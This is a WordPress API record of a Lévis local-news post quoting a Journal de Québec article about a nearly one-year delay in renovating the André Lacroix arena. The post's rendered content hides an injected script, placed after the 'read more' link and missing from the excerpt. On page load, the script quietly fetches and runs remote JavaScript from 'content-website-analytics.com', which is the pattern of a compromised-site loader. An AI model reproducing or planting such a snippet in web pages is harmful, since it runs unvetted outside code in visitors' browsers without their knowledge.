{"id":16692,"date":"2024-07-13T15:55:25","date_gmt":"2024-07-13T19:55:25","guid":{"rendered":"https:\/\/www.levisurbain.ca\/?p=16692"},"modified":"2025-11-22T09:54:29","modified_gmt":"2025-11-22T14:54:29","slug":"arena-andre-lacroix-a-levis-pres-dun-an-de-retard-pour-les-travaux","status":"publish","type":"post","link":"http:\/\/www.levisurbain.ca\/?p=16692","title":{"rendered":"Ar\u00e9na Andr\u00e9 Lacroix \u00e0 L\u00e9vis : pr\u00e8s d\u2019un an de retard pour les travaux"},"content":{"rendered":"<p>Article de St\u00e9phanie Martin. <a href=\"https:\/\/www.journaldequebec.com\/\" rel=\"noopener\" target=\"_blank\">Le Journal de Qu\u00e9bec<\/a>.<\/p>\n<blockquote><p><strong>Les travaux pr\u00e9vus \u00e0 l\u2019ar\u00e9na Andr\u00e9 Lacroix, \u00e0 L\u00e9vis, d\u00e9buteront avec pr\u00e8s d\u2019un an de retard et commenceront au d\u00e9but de l\u2019\u00e9t\u00e9 2025.<\/strong><\/p>\n<p>\u00c0 l\u2019automne 2022, le maire de L\u00e9vis avait annonc\u00e9 un investissement de 3 millions $ pour une cure de jeunesse pour l\u2019ar\u00e9na Andr\u00e9 Lacroix. Il avait fait cette annonce apr\u00e8s la parution dans Le Journal d\u2019un article dans lequel l\u2019ancien hockeyeur d\u00e9plorait l\u2019\u00e9tat de l\u2019ar\u00e9na qui porte son nom. <\/p><\/blockquote>\n<p>=> La suite au <a href=\"https:\/\/www.journaldequebec.com\/2024\/07\/12\/arena-andre-lacroix-a-levis--pres-dun-an-de-retard-pour-les-travaux\" rel=\"noopener\" target=\"_blank\">journaldequebec.com<\/a>.<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Article de St\u00e9phanie Martin. <a href=\"https:\/\/www.journaldequebec.com\/\" rel=\"noopener\" target=\"_blank\">Le Journal de Qu\u00e9bec<\/a>.<\/p>\n<blockquote><p><strong>Les travaux pr\u00e9vus \u00e0 l\u2019ar\u00e9na Andr\u00e9 Lacroix, \u00e0 L\u00e9vis, d\u00e9buteront avec pr\u00e8s d\u2019un an de retard et commenceront au d\u00e9but de l\u2019\u00e9t\u00e9 2025.<\/strong><\/p>\n<p>\u00c0 l\u2019automne 2022, le maire de L\u00e9vis avait annonc\u00e9 un investissement de 3 millions $ pour une cure de jeunesse pour l\u2019ar\u00e9na Andr\u00e9 Lacroix. Il avait fait cette annonce apr\u00e8s la parution dans Le Journal d\u2019un article dans lequel l\u2019ancien hockeyeur d\u00e9plorait l\u2019\u00e9tat de l\u2019ar\u00e9na qui porte son nom. <\/p><\/blockquote>\n<p>=> La suite au <a href=\"https:\/\/www.journaldequebec.com\/2024\/07\/12\/arena-andre-lacroix-a-levis--pres-dun-an-de-retard-pour-les-travaux\" rel=\"noopener\" target=\"_blank\">journaldequebec.com<\/a>.<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[65,57],"tags":[],"class_list":["post-16692","post","type-post","status-publish","format-standard","hentry","category-gouvernement","category-sports-arts-loisirs"],"_links":{"self":[{"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts\/16692","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16692"}],"version-history":[{"count":3,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts\/16692\/revisions"}],"predecessor-version":[{"id":24406,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=\/wp\/v2\/posts\/16692\/revisions\/24406"}],"wp:attachment":[{"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16692"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16692"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.levisurbain.ca\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16692"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}